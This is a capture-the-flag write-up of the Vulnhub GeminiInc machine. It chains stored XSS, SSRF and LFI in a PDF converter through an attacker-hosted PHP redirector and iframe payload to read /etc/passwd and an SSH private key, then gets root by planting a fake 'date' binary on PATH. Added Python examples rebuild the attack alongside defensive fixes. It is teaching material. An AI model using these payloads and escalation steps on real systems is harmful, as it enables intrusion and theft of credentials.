Vulnhub geminiinc
2022-07-03 11:47:00 【Plum_Flowers_seven】
Catalog
I. Host discovery
II. Service version detection
III. Information gathering
IV. Function analysis
V. Stored XSS
VI. Information gathering
VII. Chaining XSS + SSRF + LFI
VIII. Reading gemini's private key
IX. Searching with find
X. Inspecting the binary
XI. Forging the system command
I. Host discovery
Half-open (SYN) scan; -sS needs raw sockets, so run it as root (replace ip with the target address):
sudo nmap -sS ip
II. Service version detection

III. Information gathering
1. Page does not load
The site on port 80 does not render properly because it pulls resources from Google-hosted sites; I had to go through a proxy to view it.

2. The main page
The main page gives us the address of the application's source code.

3. Source code
Going through the files one by one, the install folder contains the login for [email protected].

4. Try signing in
Login succeeds; more functions appear in the upper left corner.
IV. Function analysis
1. export: outputs the profile as a PDF

2. edit profile: edits the profile
Whatever we enter is shown unchanged on the profile page. The username field is not filtered at all,

V. Stored XSS
so we have a stored XSS. On its own it only runs in a viewer's browser and is not enough to get us onto the server.

VI. Information gathering
1. The export output
The document properties of the exported PDF reveal the application that generated it: a plain HTML-to-PDF converter.

VII. Chaining XSS + SSRF + LFI
A search shows that this converter component is affected by all three issue classes. They chain naturally: the stored XSS puts our HTML into the profile, the converter fetches any iframe src while rendering the PDF (SSRF), and it follows the redirect we return to a file:// URL and renders the local file into the document (LFI). Combined, they let us read files on the server.
1. Start Apache on the attacking machine
sudo systemctl start apache2
cd /var/www/html
sudo vim 1.php
Create 1.php with the following content. It answers every request with a redirect to file://<file>, so the converter ends up reading the local file we name in the query string:
<?php
// ?file=/etc/passwd  ->  302 Location: file:///etc/passwd
$file = $_GET['file'];
header("Location: file://$file");
2. Inject the payload
Put the iframe into the unfiltered username field (ip is the attacking machine's address):
<iframe src="http://ip/1.php?file=/etc/passwd" width="100%" height=1220></iframe>
3. Trigger it with export
The exported PDF now contains /etc/passwd. The entry for gemini shows a login shell, so that account can log in over SSH.
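The attacker side of the chain above, as an added example that is not part of the original writeup: a Python stand-in for Apache plus 1.php, the payload builder for the username field, and the check an HTML-to-PDF renderer should apply to every URL it fetches (redirect targets included) to break this chain. The attacker address 10.0.0.5, the loopback port, the example.com resolution and the /etc/passwd target are assumptions for the demo.

```python
"""Added example (not from the original writeup). Attacker-side redirector
for the XSS -> SSRF -> LFI chain, the iframe payload, and the defensive
URL check the renderer lacked. Addresses and paths are assumptions."""
import http.client
import ipaddress
import socket
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, quote, urlparse


def redirect_target(query):
    """Same logic as the writeup's 1.php: ?file=<path> -> file://<path>.
    Returns None when the parameter is missing."""
    path = parse_qs(query).get("file", [None])[0]
    return "file://" + path if path else None


class RedirectHandler(BaseHTTPRequestHandler):
    """Answers every GET with a 302 whose Location is a file:// URL; a
    renderer that follows redirects without checking the scheme then
    reads the local file and draws it into the PDF."""

    def do_GET(self):
        target = redirect_target(urlparse(self.path).query)
        if target is None:
            self.send_response(400)
            self.end_headers()
            return
        self.send_response(302)
        self.send_header("Location", target)
        self.end_headers()

    def log_message(self, *args):  # silence per-request logging
        pass


def start_redirector(port=0):
    """Serve the redirector on a daemon thread (port 0 = pick a free port).
    Returns the server; server.server_address[1] is the port."""
    srv = ThreadingHTTPServer(("127.0.0.1", port), RedirectHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def iframe_payload(attacker, path):
    """The stored-XSS payload for the unfiltered username field."""
    return ('<iframe src="http://%s/1.php?file=%s" width="100%%" height=1220>'
            '</iframe>' % (attacker, quote(path)))


def probe(port, path):
    """Fetch the redirector the way the renderer does, but stop at the
    redirect; returns (status, Location header)."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", "/1.php?file=" + quote(path))
    resp = conn.getresponse()
    location = resp.getheader("Location")
    conn.close()
    return resp.status, location


def is_safe_fetch_target(url, resolve=socket.gethostbyname):
    """What the renderer should ask before *every* fetch, redirect hops
    included: http(s) only, and never loopback/private/link-local space.
    `resolve` is injectable so the check can be exercised offline."""
    u = urlparse(url)
    if u.scheme not in ("http", "https") or not u.hostname:
        return False
    try:
        addr = ipaddress.ip_address(u.hostname)
    except ValueError:  # a DNS name: resolve it and judge the address
        try:
            addr = ipaddress.ip_address(resolve(u.hostname))
        except (OSError, ValueError):
            return False
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_reserved or addr.is_multicast)


if __name__ == "__main__":
    srv = start_redirector()
    port = srv.server_address[1]
    print("payload for the username field:")
    print(iframe_payload("10.0.0.5", "/etc/passwd"))
    print("renderer is sent to:", probe(port, "/etc/passwd"))
    print("safe to fetch file:///etc/passwd?",
          is_safe_fetch_target("file:///etc/passwd"))
    srv.shutdown()
```

Run it and the probe line shows the 302 with Location: file:///etc/passwd that the converter follows. The defensive check has to run on each redirect target, not only on the URL first submitted, and on the address actually connected to (resolve once, then connect to that address), otherwise a DNS rebind slips past it.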

VIII. Reading gemini's private key
1. Read the key
Use the same chain with the file parameter pointing at gemini's SSH private key, then save the recovered key on Kali.

2. SSH login with the key
Log in with the saved key (chmod 600 it first, otherwise ssh refuses to use it). Login succeeds.

IX. Searching with find
Look for SUID binaries owned by root:
find / -type f -user root -perm -u+xs -ls 2>/dev/null

X. Inspecting the binary
1. Analysing /usr/bin/listinfo
strings /usr/bin/listinfo
Output:
The lines that matter are the ones calling a system command: the binary runs date through system() by its bare name, so the command is resolved through the caller's PATH.

2. Running it

XI. Forging the system command
1. Create a fake date
vim date.c

Content:
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

/* listinfo is SUID root, so our "date" starts with effective uid 0.
 * setuid(0)/setgid(0) make the real ids root as well, so the bash that
 * system() spawns keeps root instead of dropping back to gemini. */
int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
Compile it with gcc and put the resulting binary in /tmp under the name date.
2. Modify the environment variable
The shell searches PATH from left to right, so putting /tmp first makes our date win over the real one:
export PATH=/tmp:$PATH
3. Run listinfo
listinfo now executes /tmp/date as root and we get a root shell.

Read flag.txt
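The PATH hijack behind sections X and XI, reproduced as an added example that is not part of the original writeup: a fake date is planted in a scratch directory, a model of listinfo's system("date") is run with the poisoned PATH, and the hardened call style is shown beside it. The scratch directory, the HIJACKED marker and the `+%Y` argument are constructed for the demo; no setuid binary is involved, so it runs as an ordinary user.

```python
"""Added example (not from the original writeup). Reproduces the PATH hijack
behind the listinfo privilege escalation in a scratch directory and shows
the call style that is immune to it. Directory, marker text and the date
argument are constructed for the demo; nothing here is setuid."""
import os
import shutil
import stat
import subprocess
import tempfile

FAKE_OUTPUT = "HIJACKED"  # what our stand-in for /tmp/date prints


def plant_fake_date(directory):
    """Drop an executable named 'date' into `directory` (the writeup's
    /tmp/date, here a shell script instead of the compiled C wrapper)."""
    path = os.path.join(directory, "date")
    with open(path, "w") as f:
        f.write("#!/bin/sh\necho %s\n" % FAKE_OUTPUT)
    mode = os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    os.chmod(path, mode)
    return path


def hostile_env(attacker_dir):
    """The environment after `export PATH=/tmp:$PATH`: attacker dir first."""
    env = dict(os.environ)
    env["PATH"] = attacker_dir + ":" + env.get("PATH", "/usr/bin:/bin")
    return env


def resolve_like_shell(cmd, path_env):
    """Which file the shell runs for a bare command name under this PATH:
    directories are searched left to right, first executable hit wins."""
    return shutil.which(cmd, path=path_env)


def vulnerable_call(env):
    """Model of listinfo's system("date"): /bin/sh -c 'date' inherits the
    caller's environment, so the bare name resolves through their PATH."""
    out = subprocess.run(["/bin/sh", "-c", "date"], env=env,
                         capture_output=True, text=True)
    return out.stdout.strip()


def hardened_call(_inherited_env):
    """The fix: ignore the inherited environment, resolve the command
    against a fixed trusted PATH and run it by absolute path, no shell."""
    trusted = "/usr/bin:/bin"
    exe = shutil.which("date", path=trusted)
    out = subprocess.run([exe, "+%Y"], env={"PATH": trusted},
                         capture_output=True, text=True)
    return out.stdout.strip()


def run_demo():
    """Plant the fake date, run both styles, clean up, return the results."""
    d = tempfile.mkdtemp(prefix="pathhijack-")
    try:
        plant_fake_date(d)
        env = hostile_env(d)
        return {
            "dir": d,
            "resolved": resolve_like_shell("date", env["PATH"]),
            "vulnerable": vulnerable_call(env),
            "hardened": hardened_call(env),
        }
    finally:
        shutil.rmtree(d, ignore_errors=True)


if __name__ == "__main__":
    for key, value in run_demo().items():
        print("%-10s %s" % (key, value))
```

The vulnerable call prints HIJACKED while the hardened one prints the current year. The same fix applies to listinfo itself: exec the absolute path with a clean environment instead of system("date"), and drop the setuid bit if the program does not actually need root.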